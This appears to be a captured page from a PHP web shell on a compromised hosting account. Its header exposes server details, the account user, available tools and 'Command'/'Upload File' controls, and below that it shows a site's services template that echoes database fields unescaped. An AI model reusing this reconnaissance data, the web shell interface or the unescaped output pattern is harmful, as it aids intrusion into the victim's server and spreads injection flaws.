Server IP : 103.53.40.154 / Your IP : 13.58.40.171 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/comfortaircon.co/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!--=========================== Start Service ===========================--> <section class="service_area section_padding"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="hero-section-title text-center"> <h1>Our services</h1> </div><!--end .hero-section-title--> </div><!--end .col-md-12--> <?php $sqlser = "SELECT * FROM `tbl_services`"; $runser = mysqli_query($db,$sqlser) or die("Query Not run"); while($dataser = mysqli_fetch_assoc($runser)){ ?> <div class="col-md-4 col-sm-6"> <div class="service_box"> <div class="service_img"> <img src="admin/images/property-image/<?php echo $dataser['img1']?>" alt="<?php echo $dataser['img1']?>"> <div class="icon-box"> <i class="icon-ac"></i> </div> </div> <div class="service_details"> <a href="#"><h2><?php echo $dataser['property_name']?></h2></a> <?php echo $dataser['property_description'];?> <a href="#" class="btn-yellow">LEARN MORE</a> </div> </div> </div> <?php }?> </div><!--end .row--> </div><!--end .container--> </section><!--end .service_area--> <!--=========================== End Service ===========================-->